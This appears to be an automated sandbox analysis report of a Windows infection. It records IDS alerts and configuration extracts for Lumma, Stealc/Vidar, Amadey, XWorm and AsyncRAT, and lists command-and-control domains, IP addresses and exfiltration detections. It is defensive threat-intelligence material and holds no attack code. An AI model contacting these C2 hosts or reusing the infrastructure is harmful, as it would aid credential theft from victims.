Source: Network traffic	Suricata IDS: 2059404 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (yuriy-gagarin .com in TLS SNI) : 192.168.2.4:59722 -> 104.21.82.94:443
Source: Network traffic	Suricata IDS: 2059424 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) : 192.168.2.4:59730 -> 104.21.29.142:443
Source: Network traffic	Suricata IDS: 2059404 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (yuriy-gagarin .com in TLS SNI) : 192.168.2.4:59738 -> 104.21.82.94:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:59723 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059404 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (yuriy-gagarin .com in TLS SNI) : 192.168.2.4:59731 -> 104.21.82.94:443
Source: Network traffic	Suricata IDS: 2059404 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (yuriy-gagarin .com in TLS SNI) : 192.168.2.4:59750 -> 104.21.82.94:443
Source: Network traffic	Suricata IDS: 2059424 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) : 192.168.2.4:59751 -> 104.21.29.142:443
Source: Network traffic	Suricata IDS: 2059404 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (yuriy-gagarin .com in TLS SNI) : 192.168.2.4:59777 -> 104.21.82.94:443
Source: Network traffic	Suricata IDS: 2059424 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) : 192.168.2.4:59782 -> 104.21.29.142:443
Source: Network traffic	Suricata IDS: 2059404 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (yuriy-gagarin .com in TLS SNI) : 192.168.2.4:59784 -> 104.21.82.94:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:59765 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059404 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (yuriy-gagarin .com in TLS SNI) : 192.168.2.4:59781 -> 104.21.82.94:443
Source: Network traffic	Suricata IDS: 2059424 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) : 192.168.2.4:59796 -> 104.21.29.142:443
Source: Network traffic	Suricata IDS: 2059424 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) : 192.168.2.4:59709 -> 104.21.29.142:443
Source: Network traffic	Suricata IDS: 2059404 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (yuriy-gagarin .com in TLS SNI) : 192.168.2.4:59801 -> 104.21.82.94:443
Source: Network traffic	Suricata IDS: 2059404 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (yuriy-gagarin .com in TLS SNI) : 192.168.2.4:59817 -> 104.21.82.94:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:59802 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059041 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (femalsabler .shop) : 192.168.2.4:54953 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059037 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (chipdonkeruz .shop) : 192.168.2.4:58890 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059035 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (apporholis .shop) : 192.168.2.4:54845 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059049 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (robinsharez .shop) : 192.168.2.4:61002 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059039 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crowdwarek .shop) : 192.168.2.4:63773 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059043 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (handscreamny .shop) : 192.168.2.4:57574 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059057 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (versersleep .shop) : 192.168.2.4:57235 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:59826 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059404 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (yuriy-gagarin .com in TLS SNI) : 192.168.2.4:59827 -> 104.21.82.94:443
Source: Network traffic	Suricata IDS: 2059424 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) : 192.168.2.4:59825 -> 104.21.29.142:443
Source: Network traffic	Suricata IDS: 2059051 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (soundtappysk .shop) : 192.168.2.4:59157 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059404 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (yuriy-gagarin .com in TLS SNI) : 192.168.2.4:59753 -> 104.21.82.94:443
Source: Network traffic	Suricata IDS: 2059404 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (yuriy-gagarin .com in TLS SNI) : 192.168.2.4:59836 -> 104.21.82.94:443
Source: Network traffic	Suricata IDS: 2059404 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (yuriy-gagarin .com in TLS SNI) : 192.168.2.4:59837 -> 104.21.82.94:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:59838 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:59841 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 1800002 - Severity 1 - Joe Security MALWARE Nymiam - C&C DLL Key Request : 192.168.2.4:59863 -> 185.156.73.23:80
Source: Network traffic	Suricata IDS: 1800003 - Severity 1 - Joe Security MALWARE Nymiam - C&C DLL Download Request : 192.168.2.4:59863 -> 185.156.73.23:80
Source: Network traffic	Suricata IDS: 1800004 - Severity 1 - Joe Security MALWARE Nymiam - C&C Files Download Request : 192.168.2.4:59863 -> 185.156.73.23:80
Source: Network traffic	Suricata IDS: 1800005 - Severity 1 - Joe Security MALWARE Nymiam - C&C Software Download Request : 192.168.2.4:59863 -> 185.156.73.23:80
Source: Network traffic	Suricata IDS: 2853192 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - sendPlugin Outbound : 192.168.2.4:59934 -> 91.212.166.99:4404
Source: Network traffic	Suricata IDS: 2853191 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - savePlugin Inbound : 91.212.166.99:4404 -> 192.168.2.4:59934
Source: Network traffic	Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:59934 -> 91.212.166.99:4404
Source: Network traffic	Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 91.212.166.99:4404 -> 192.168.2.4:59934
Source: Network traffic	Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.4:59934 -> 91.212.166.99:4404
Source: Network traffic	Suricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 159.100.19.137:7707 -> 192.168.2.4:59972
Source: Network traffic	Suricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT/zgRAT Style SSL Cert : 159.100.19.137:7707 -> 192.168.2.4:59972
Source: Network traffic	Suricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 159.100.19.137:7707 -> 192.168.2.4:59980
Source: Network traffic	Suricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 91.212.166.99:4404 -> 192.168.2.4:59934
Source: Network traffic	Suricata IDS: 2059415 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rainy-lamep .bond) : 192.168.2.4:58753 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49744 -> 104.21.76.27:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49744 -> 104.21.76.27:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49843 -> 104.21.76.27:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:59848 -> 104.21.82.94:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:59861 -> 104.21.76.27:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49749 -> 104.21.76.27:443
Source: Network traffic	Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:59827 -> 104.102.49.254:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:59848 -> 104.21.82.94:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49749 -> 104.21.76.27:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:59823 -> 104.21.29.142:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:59823 -> 104.21.29.142:443
Source: Network traffic	Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:59710 -> 104.102.49.254:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:59730 -> 104.21.29.142:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:59712 -> 104.21.82.94:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:59738 -> 104.21.82.94:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:59738 -> 104.21.82.94:443
Source: Network traffic	Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.4:59779 -> 5.75.209.106:443
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 5.75.209.106:443 -> 192.168.2.4:59779
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:59825 -> 104.21.29.142:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:59814 -> 5.75.209.106:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:59814 -> 5.75.209.106:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:59831 -> 5.75.209.106:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:59831 -> 5.75.209.106:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:59812 -> 5.75.209.106:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:59812 -> 5.75.209.106:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:59722 -> 104.21.82.94:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:59722 -> 104.21.82.94:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:59783 -> 5.75.209.106:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:59827 -> 104.21.82.94:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:59833 -> 5.75.209.106:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:59833 -> 5.75.209.106:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:59780 -> 5.75.209.106:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:59828 -> 5.75.209.106:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:59828 -> 5.75.209.106:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:59808 -> 5.75.209.106:443
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 5.75.209.106:443 -> 192.168.2.4:59771
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:59830 -> 5.75.209.106:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:59830 -> 5.75.209.106:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:59842 -> 104.21.29.142:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:59842 -> 104.21.29.142:443
Source: Network traffic	Suricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.4:59752 -> 5.75.209.106:443
Source: Network traffic	Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:59824 -> 104.102.49.254:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:59823 -> 5.75.209.106:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:59823 -> 5.75.209.106:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:59822 -> 5.75.209.106:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:59832 -> 5.75.209.106:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:59832 -> 5.75.209.106:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:59835 -> 104.21.82.94:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:59835 -> 104.21.82.94:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:51713 -> 104.21.82.94:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:59846 -> 5.75.209.106:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:59854 -> 5.75.209.106:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:59873 -> 5.75.209.106:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:59870 -> 5.75.209.106:443
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:59875 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:59877 -> 5.75.209.106:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:59868 -> 5.75.209.106:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:59847 -> 5.75.209.106:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:59872 -> 5.75.209.106:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:59871 -> 5.75.209.106:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:59851 -> 5.75.209.106:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:59865 -> 5.75.209.106:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:59895 -> 5.75.209.106:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:59906 -> 5.75.209.106:443
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 5.75.209.106:443 -> 192.168.2.4:59867
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:59891 -> 5.75.209.106:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:59843 -> 5.75.209.106:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:59908 -> 5.75.209.106:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:59908 -> 5.75.209.106:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:59917 -> 5.75.209.106:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:59919 -> 5.75.209.106:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:59919 -> 5.75.209.106:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:59886 -> 5.75.209.106:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:59910 -> 5.75.209.106:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:59910 -> 5.75.209.106:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:59914 -> 5.75.209.106:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:59914 -> 5.75.209.106:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:59899 -> 5.75.209.106:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:59927 -> 5.75.209.106:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:59927 -> 5.75.209.106:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:59921 -> 5.75.209.106:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:59932 -> 5.75.209.106:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:59932 -> 5.75.209.106:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:59921 -> 5.75.209.106:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:59930 -> 5.75.209.106:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:59930 -> 5.75.209.106:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:59821 -> 5.75.209.106:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:59821 -> 5.75.209.106:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:59861 -> 5.75.209.106:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:59923 -> 5.75.209.106:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:59923 -> 5.75.209.106:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:59939 -> 5.75.209.106:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:59944 -> 5.75.209.106:443
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 5.75.209.106:443 -> 192.168.2.4:59864

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\regsvr32.exe	Network Connect: 208.95.112.1 80
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 91.212.166.99 4404

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: https://toppyneedus.biz/api
Source: Malware configuration extractor	URLs: 91.212.166.99
Source: Malware configuration extractor	URLs: https://steamcommunity.com/profiles/76561199819539662
Source: Malware configuration extractor	IPs: 185.215.113.43

Tries to resolve many domain names, but no domain seems valid

Source: unknown	DNS traffic detected: query: impolitewearr.biz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: kickykiduz.lat replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: breakfasutwy.cyou replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: rabidcowse.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: finickypwk.lat replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: miniatureyu.lat replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: wholersorie.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: shoefeatthe.lat replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: chipdonkeruz.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: noisycuttej.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: bloodyswif.lat replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: apporholis.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: crowdwarek.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: washyceehsu.lat replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: abruptyopsn.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: savorraiykj.lat replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: handscreamny.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: femalsabler.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: robinsharez.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: tawdrydadysz.icu replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: nearycrepso.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: flockanxiius.sbs replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: tirepublicerj.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vDlEBMuDjxssbo.vDlEBMuDjxssbo replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: edcatiofireeu.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: cloudewahsj.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: leggelatez.lat replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: framekgirus.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: versersleep.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: soundtappysk.shop replaycode: Name error (3)

Yara detected Generic Downloader

Source: Yara match	File source: 42.2.regsvr32.exe.2530000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.2.regsvr32.exe.ababde.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.2.regsvr32.exe.256131e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000002A.00000002.4191598560.0000000002530000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Source: unknown

Network traffic detected: DNS query count 39

Source: global traffic

TCP traffic: 192.168.2.4:59844 -> 89.105.201.183:2024

